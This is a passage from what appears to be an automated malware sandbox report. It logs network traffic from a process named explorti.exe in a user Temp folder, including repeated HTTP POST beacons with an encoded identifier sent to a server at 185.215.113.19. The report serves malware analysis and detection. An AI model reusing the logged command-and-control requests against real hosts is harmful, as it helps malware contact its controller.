                      Jul 26, 2024 20:57:43.260224104 CEST4977080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:43.260380030 CEST4977180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:43.265738010 CEST8049771185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:43.265830994 CEST4977180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:43.265907049 CEST8049770185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:43.265912056 CEST4977180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:43.265978098 CEST4977080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:43.270901918 CEST8049771185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:44.040589094 CEST8049771185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:44.040738106 CEST4977180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:44.041460991 CEST4977180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:44.046363115 CEST8049771185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:44.293975115 CEST8049771185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:44.294116974 CEST4977180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:44.400881052 CEST4977180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:44.401192904 CEST4977280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:44.408467054 CEST8049772185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:44.408569098 CEST4977280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:44.408723116 CEST4977280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:44.409157991 CEST8049771185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:44.409231901 CEST4977180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:44.414477110 CEST8049772185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:45.182593107 CEST8049772185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:45.182758093 CEST4977280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:45.183196068 CEST4977280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:45.188075066 CEST8049772185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:45.435314894 CEST8049772185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:45.435492039 CEST4977280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:45.541660070 CEST4977280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:45.541966915 CEST4977380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:45.552740097 CEST8049773185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:45.552855968 CEST4977380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:45.553071022 CEST4977380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:45.553236008 CEST8049772185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:45.553458929 CEST4977280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:45.558290005 CEST8049773185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:46.296711922 CEST8049773185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:46.296801090 CEST4977380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:46.299961090 CEST4977380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:46.305066109 CEST8049773185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:46.545428991 CEST8049773185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:46.545537949 CEST4977380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:46.666503906 CEST4977380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:46.666771889 CEST4977480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:46.678412914 CEST8049774185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:46.678607941 CEST4977480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:46.678755045 CEST4977480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:46.678834915 CEST8049773185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:46.678901911 CEST4977380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:46.684429884 CEST8049774185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:47.433199883 CEST8049774185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:47.433331966 CEST4977480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:47.434026003 CEST4977480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:47.439429045 CEST8049774185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:47.682704926 CEST8049774185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:47.682817936 CEST4977480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:47.792030096 CEST4977480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:47.792452097 CEST4977580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:47.801460028 CEST8049775185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:47.801578045 CEST4977580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:47.801697016 CEST4977580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:47.802865028 CEST8049774185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:47.802931070 CEST4977480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:47.806962967 CEST8049775185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:48.583400011 CEST8049775185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:48.583568096 CEST4977580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:48.584208965 CEST4977580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:48.589143991 CEST8049775185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:48.903158903 CEST8049775185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:48.903280973 CEST4977580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:49.012382984 CEST4977580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:49.013725996 CEST4977680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:49.021815062 CEST8049775185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:49.021994114 CEST4977580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:49.022087097 CEST8049776185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:49.022161961 CEST4977680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:49.022285938 CEST4977680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:49.031611919 CEST8049776185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:49.840581894 CEST8049776185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:49.840755939 CEST4977680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:49.842149973 CEST4977680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:49.858196020 CEST8049776185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:50.104958057 CEST8049776185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:50.105051041 CEST4977680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:50.213574886 CEST4977680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:50.213843107 CEST4977780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:50.238337994 CEST8049777185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:50.238440037 CEST4977780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:50.238898039 CEST4977780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:50.247942924 CEST8049777185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:50.249027967 CEST8049776185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:50.249149084 CEST4977680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:51.019289017 CEST8049777185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:51.019474983 CEST4977780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:51.020160913 CEST4977780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:51.025377035 CEST8049777185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:51.281037092 CEST8049777185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:51.281124115 CEST4977780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:51.385236979 CEST4977780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:51.385607004 CEST4977880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:51.391376972 CEST8049777185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:51.391422987 CEST8049778185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:51.391462088 CEST4977780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:51.391494989 CEST4977880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:51.391597986 CEST4977880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:51.397454023 CEST8049778185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:52.171596050 CEST8049778185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:52.171931982 CEST4977880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:52.173181057 CEST4977880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:52.178577900 CEST8049778185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:52.422719002 CEST8049778185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:52.422823906 CEST4977880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:52.529957056 CEST4977880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:52.530746937 CEST4977980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:52.535897017 CEST8049778185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:52.536081076 CEST4977880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:52.537003994 CEST8049779185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:52.537090063 CEST4977980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:52.537200928 CEST4977980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:52.542746067 CEST8049779185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:53.285434961 CEST8049779185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:53.285543919 CEST4977980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:53.286292076 CEST4977980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:53.291502953 CEST8049779185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:53.532587051 CEST8049779185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:53.532655001 CEST4977980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:53.635262966 CEST4977980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:53.635550022 CEST4978080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:53.640664101 CEST8049780185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:53.640784025 CEST4978080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:53.640933990 CEST4978080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:53.641211987 CEST8049779185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:53.641275883 CEST4977980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:53.646014929 CEST8049780185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:54.403614998 CEST8049780185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:54.403719902 CEST4978080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:54.404536963 CEST4978080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:54.410067081 CEST8049780185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:54.655740976 CEST8049780185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:54.655844927 CEST4978080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:54.760237932 CEST4978080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:54.760632992 CEST4978180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:54.765971899 CEST8049781185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:54.766076088 CEST4978180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:54.766233921 CEST4978180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:54.768366098 CEST8049780185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:54.768435955 CEST4978080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:54.771996975 CEST8049781185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:55.547815084 CEST8049781185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:55.547908068 CEST4978180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:55.549182892 CEST4978180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:55.554208040 CEST8049781185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:55.959820032 CEST8049781185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:55.960056067 CEST4978180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:56.073225975 CEST4978180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:56.073565006 CEST4978280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:56.078772068 CEST8049782185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:56.078856945 CEST4978280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:56.079212904 CEST4978280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:56.079528093 CEST8049781185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:56.079579115 CEST4978180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:56.084055901 CEST8049782185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:56.872687101 CEST8049782185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:56.872807980 CEST4978280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:56.883215904 CEST4978280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:56.888601065 CEST8049782185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:57.163477898 CEST8049782185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:57.163578987 CEST4978280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:57.278182030 CEST4978280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:57.278558969 CEST4978380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:57.285231113 CEST8049783185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:57.285320044 CEST4978380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:57.285527945 CEST4978380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:57.285938978 CEST8049782185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:57.285998106 CEST4978280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:57.291819096 CEST8049783185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:58.180763006 CEST8049783185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:58.180838108 CEST4978380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:58.182615042 CEST4978380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:58.187510014 CEST8049783185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:58.434827089 CEST8049783185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:58.435033083 CEST4978380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:58.542243958 CEST4978380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:58.542510986 CEST4978480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:58.550719976 CEST8049784185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:58.550817966 CEST4978480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:58.550977945 CEST4978480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:58.553066969 CEST8049783185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:58.553136110 CEST4978380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:58.556021929 CEST8049784185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:59.303210974 CEST8049784185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:59.303313971 CEST4978480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:59.304164886 CEST4978480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:59.309039116 CEST8049784185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:59.551167011 CEST8049784185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:59.551243067 CEST4978480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:59.729748011 CEST4978480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:59.730448008 CEST4978580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:59.735599041 CEST8049785185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:59.735721111 CEST8049784185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:59.735843897 CEST4978480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:59.735872030 CEST4978580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:59.736005068 CEST4978580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:59.740926981 CEST8049785185.215.113.19192.168.2.4
                      Jul 26, 2024 20:58:00.504157066 CEST8049785185.215.113.19192.168.2.4
                      Jul 26, 2024 20:58:00.507572889 CEST4978580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:58:00.508196115 CEST4978580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:58:00.513479948 CEST8049785185.215.113.19192.168.2.4
                      Jul 26, 2024 20:58:00.757834911 CEST8049785185.215.113.19192.168.2.4
                      Jul 26, 2024 20:58:00.758008003 CEST4978580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:58:00.869946003 CEST4978580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:58:00.870238066 CEST4978680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:58:00.875145912 CEST8049786185.215.113.19192.168.2.4
                      Jul 26, 2024 20:58:00.875232935 CEST4978680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:58:00.875314951 CEST4978680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:58:00.875504017 CEST8049785185.215.113.19192.168.2.4
                      Jul 26, 2024 20:58:00.875657082 CEST4978580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:58:00.880131960 CEST8049786185.215.113.19192.168.2.4
                      Jul 26, 2024 20:58:01.802970886 CEST8049786185.215.113.19192.168.2.4
                      Jul 26, 2024 20:58:01.803076982 CEST4978680192.168.2.4185.215.113.19

                      HTTP Request Dependency Graph

                      • 185.215.113.19

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.449737185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:02.821043968 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:03.606364965 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:03.608504057 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:03.861641884 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.449738185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:03.985050917 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:04.743524075 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:04.744437933 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:04.996643066 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.449739185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:05.117528915 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:05.905831099 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:05 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:05.907996893 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:06.160979986 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.449740185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:06.281061888 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:07.061556101 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:07.062403917 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:07.310533047 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:07 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.449741185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:07.437958956 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:08.195735931 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:08 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:08.197449923 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
